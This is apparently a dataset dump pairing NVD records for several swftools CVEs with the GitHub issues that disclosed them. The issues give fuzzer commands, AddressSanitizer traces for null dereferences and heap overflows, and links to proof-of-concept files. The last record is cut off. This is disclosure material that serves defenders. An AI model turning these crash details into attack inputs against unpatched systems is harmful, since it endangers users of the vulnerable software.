cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2021-39575
2021-09-20T16:15:13.737
An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function dump_method() located in abc.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/128" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/128" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/matthiaskramm/swftools/issues/128
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu x86_64, clang 6.0, swfdump (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./src/swfdump -D @@ ## Output ``` Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==35749==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55e82ff9dda0 bp 0x55e83006d140 sp 0x7ffdfc2bfc80 T0) #0 0x55e82ff9dd9f in dump_method as3/abc.c:361 #1 0x55e82ffa91a4 in swf_DumpABC as3/abc.c:707 #2 0x55e82ff1f038 in main /home/seviezhou/swftools/src/swfdump.c:1578 #3 0x7f6a32462b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #4 0x55e82ff22439 in _start (/home/seviezhou/swftools/src/swfdump+0xd0439) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV as3/abc.c:361 dump_method ==35749==ABORTING ``` ## POC [SEGV-dump_method-abc-361.zip](https://github.com/matthiaskramm/swftools/files/5032732/SEGV-dump_method-abc-361.zip)
A Segmentation fault in abc.c:361
https://api.github.com/repos/swftools/swftools/issues/128/comments
0
2020-08-06T05:20:06Z
2020-08-06T05:20:06Z
https://github.com/swftools/swftools/issues/128
674,025,035
128
2,577
CVE-2021-39577
2021-09-20T16:15:13.777
An issue was discovered in swftools through 20200710. A heap-buffer-overflow exists in the function main() located in swfdump.c. It allows an attacker to cause code Execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/121" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/121" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/matthiaskramm/swftools/issues/121
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu x86_64, clang 6.0, swfdump (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./src/swfdump -D @@ ## AddressSanitizer output ``` ================================================================= ==46368==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000ef52 at pc 0x7f3ab3fed1fb bp 0x7ffd0e92b0f0 sp 0x7ffd0e92a898 READ of size 3 at 0x60200000ef52 thread T0 #0 0x7f3ab3fed1fa in strlen (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x701fa) #1 0x55b50c3223a4 in main /home/seviezhou/swftools/src/swfdump.c:1406 #2 0x7f3ab3990b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #3 0x55b50c325439 in _start (/home/seviezhou/swftools/src/swfdump+0xd0439) 0x60200000ef52 is located 0 bytes to the right of 2-byte region [0x60200000ef50,0x60200000ef52) allocated by thread T0 here: #0 0x7f3ab4015612 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98612) #1 0x55b50c460ca7 in rfx_alloc /home/seviezhou/swftools/lib/mem.c:30 #2 0x55b50c46f096 (/home/seviezhou/swftools/src/swfdump+0x21a096) SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 strlen Shadow bytes around the buggy address: 0x0c047fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa 01 fa fa fa 01 fa =>0x0c047fff9de0: fa fa 01 fa fa fa 00 02 fa fa[02]fa fa fa 01 fa 0x0c047fff9df0: fa fa 01 fa fa fa 05 fa fa fa 00 02 fa fa 00 04 0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==46368==ABORTING ``` ## POC [heap-overflow-main-swfdump-1406.zip](https://github.com/matthiaskramm/swftools/files/5026794/heap-overflow-main-swfdump-1406.zip)
A heap-buffer-overflow in swfdump.c:1406
https://api.github.com/repos/swftools/swftools/issues/121/comments
0
2020-08-05T07:26:44Z
2020-08-05T07:26:44Z
https://github.com/swftools/swftools/issues/121
673,319,238
121
2,578
CVE-2021-39579
2021-09-20T16:15:13.817
An issue was discovered in swftools through 20200710. A heap-buffer-overflow exists in the function string_hash() located in q.c. It allows an attacker to cause code Execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/125" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/125" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/matthiaskramm/swftools/issues/125
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu x86_64, clang 6.0, swfdump (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./src/swfdump -D @@ ## AddressSanitizer output ``` ================================================================= ==50415==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000efc2 at pc 0x55885e14b03a bp 0x7fff88438ab0 sp 0x7fff88438aa0 READ of size 1 at 0x60300000efc2 thread T0 #0 0x55885e14b039 in string_hash /home/seviezhou/swftools/lib/q.c:727 #1 0x55885e14e879 in dict_put /home/seviezhou/swftools/lib/q.c:1146 #2 0x55885e15486b in array_append /home/seviezhou/swftools/lib/q.c:1531 #3 0x55885e0c2c7d in pool_read as3/pool.c:1130 #4 0x55885e0aef44 in swf_ReadABC as3/abc.c:748 #5 0x55885e024003 in main /home/seviezhou/swftools/src/swfdump.c:1577 #6 0x7fde3d2e9b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #7 0x55885e027439 in _start (/home/seviezhou/swftools/src/swfdump+0xd0439) 0x60300000efc2 is located 0 bytes to the right of 18-byte region [0x60300000efb0,0x60300000efc2) allocated by thread T0 here: #0 0x7fde3d96e612 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98612) #1 0x55885e162ca7 in rfx_alloc /home/seviezhou/swftools/lib/mem.c:30 #2 0x55885e171096 (/home/seviezhou/swftools/src/swfdump+0x21a096) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/seviezhou/swftools/lib/q.c:727 string_hash Shadow bytes around the buggy address: 0x0c067fff9da0: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 0x0c067fff9db0: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 0x0c067fff9dc0: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa 0x0c067fff9dd0: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 0x0c067fff9de0: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa =>0x0c067fff9df0: fd fd fd fd fa fa 00 00[02]fa fa fa 00 00 02 fa 0x0c067fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==50415==ABORTING ``` ## POC [heap-overflow-string_hash-q-727.zip](https://github.com/matthiaskramm/swftools/files/5026864/heap-overflow-string_hash-q-727.zip)
A heap-buffer-overflow in q.c:727
https://api.github.com/repos/swftools/swftools/issues/125/comments
0
2020-08-05T07:42:59Z
2020-08-05T07:42:59Z
https://github.com/swftools/swftools/issues/125
673,328,772
125
2,579
CVE-2021-39582
2021-09-20T16:15:13.860
An issue was discovered in swftools through 20200710. A heap-buffer-overflow exists in the function swf_GetPlaceObject() located in swfobject.c. It allows an attacker to cause code Execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/122" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/122" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/matthiaskramm/swftools/issues/122
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu x86_64, clang 6.0, swfdump (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./src/swfdump -D @@ ## AddressSanitizer output ``` ================================================================= ==16659==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000ef95 at pc 0x7f6f9085a1fb bp 0x7ffd450e1b90 sp 0x7ffd450e1338 READ of size 1 at 0x60200000ef95 thread T0 #0 0x7f6f9085a1fa in strlen (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x701fa) #1 0x564d72dccc05 in swf_GetPlaceObject modules/swfobject.c:195 #2 0x564d72da4174 in main /home/seviezhou/swftools/src/swfdump.c:1341 #3 0x7f6f901fdb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #4 0x564d72da8439 in _start (/home/seviezhou/swftools/src/swfdump+0xd0439) 0x60200000ef95 is located 0 bytes to the right of 5-byte region [0x60200000ef90,0x60200000ef95) allocated by thread T0 here: #0 0x7f6f90882612 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98612) #1 0x564d72ee3ca7 in rfx_alloc /home/seviezhou/swftools/lib/mem.c:30 #2 0x564d72ef2096 (/home/seviezhou/swftools/src/swfdump+0x21a096) SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 strlen Shadow bytes around the buggy address: 0x0c047fff9da0: fa fa fd fd fa fa fd fa fa fa fd fd fa fa 06 fa 0x0c047fff9db0: fa fa 00 00 fa fa 06 fa fa fa 00 00 fa fa 06 fa 0x0c047fff9dc0: fa fa 00 00 fa fa 06 fa fa fa 00 00 fa fa 06 fa 0x0c047fff9dd0: fa fa 00 00 fa fa 06 fa fa fa 00 00 fa fa fd fa 0x0c047fff9de0: fa fa 00 00 fa fa 00 fa fa fa 05 fa fa fa 00 01 =>0x0c047fff9df0: fa fa[05]fa fa fa 00 06 fa fa 04 fa fa fa 03 fa 0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==16659==ABORTING ``` ## POC [heap-overflow-swf_GetPlaceObject-swfobject-195.zip](https://github.com/matthiaskramm/swftools/files/5026820/heap-overflow-swf_GetPlaceObject-swfobject-195.zip)
A heap-buffer-overflow in swfobject.c:195
https://api.github.com/repos/swftools/swftools/issues/122/comments
0
2020-08-05T07:32:22Z
2020-08-05T07:32:22Z
https://github.com/swftools/swftools/issues/122
673,322,461
122
2,580
CVE-2021-39583
2021-09-20T16:15:13.903
An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function pool_lookup_string2() located in pool.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/136" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/136" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/matthiaskramm/swftools/issues/136
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu x86_64, clang 6.0, swfdump (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./src/swfdump -D @@ ## Output ``` Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==70016==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x55a36a93679a bp 0x60200000ec10 sp 0x7ffdfdb62ca0 T0) #0 0x55a36a936799 in pool_lookup_string2 as3/pool.c:1043 #1 0x55a36a936d4a in constant_fromindex as3/pool.c:740 #2 0x55a36a9299ad in swf_ReadABC as3/abc.c:789 #3 0x55a36a89c003 in main /home/seviezhou/swftools/src/swfdump.c:1577 #4 0x7fbc41038b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #5 0x55a36a89f439 in _start (/home/seviezhou/swftools/src/swfdump+0xd0439) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV as3/pool.c:1043 pool_lookup_string2 ==70016==ABORTING ``` ## POC [SEGV-pool_lookup_string2-pool-1043.zip](https://github.com/matthiaskramm/swftools/files/5032805/SEGV-pool_lookup_string2-pool-1043.zip)
A Segmentation fault in pool.c:1043
https://api.github.com/repos/swftools/swftools/issues/136/comments
0
2020-08-06T05:41:56Z
2020-08-06T05:41:56Z
https://github.com/swftools/swftools/issues/136
674,033,430
136
2,581
CVE-2021-39584
2021-09-20T16:15:13.947
An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function namespace_set_hash() located in pool.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/130" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/130" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/matthiaskramm/swftools/issues/130
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu x86_64, clang 6.0, swfdump (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./src/swfdump -D @@ ## Output ``` Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==4281==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x562d403c611d bp 0x60300000ebf8 sp 0x7ffd855128d0 T0) #0 0x562d403c611c in namespace_set_hash as3/pool.c:300 #1 0x562d4045e879 in dict_put /home/seviezhou/swftools/lib/q.c:1146 #2 0x562d4046486b in array_append /home/seviezhou/swftools/lib/q.c:1531 #3 0x562d403d3337 in pool_read as3/pool.c:1160 #4 0x562d403bef44 in swf_ReadABC as3/abc.c:748 #5 0x562d40334003 in main /home/seviezhou/swftools/src/swfdump.c:1577 #6 0x7fd1eca91b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #7 0x562d40337439 in _start (/home/seviezhou/swftools/src/swfdump+0xd0439) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV as3/pool.c:300 namespace_set_hash ==4281==ABORTING ``` ## POC [SEGV-namespace_set_hash-pool-300.zip](https://github.com/matthiaskramm/swftools/files/5032753/SEGV-namespace_set_hash-pool-300.zip)
A Segmentation fault in pool.c:300
https://api.github.com/repos/swftools/swftools/issues/130/comments
0
2020-08-06T05:23:46Z
2020-08-06T05:23:46Z
https://github.com/swftools/swftools/issues/130
674,026,521
130
2,582
CVE-2021-39585
2021-09-20T16:15:13.987
An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function traits_dump() located in abc.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
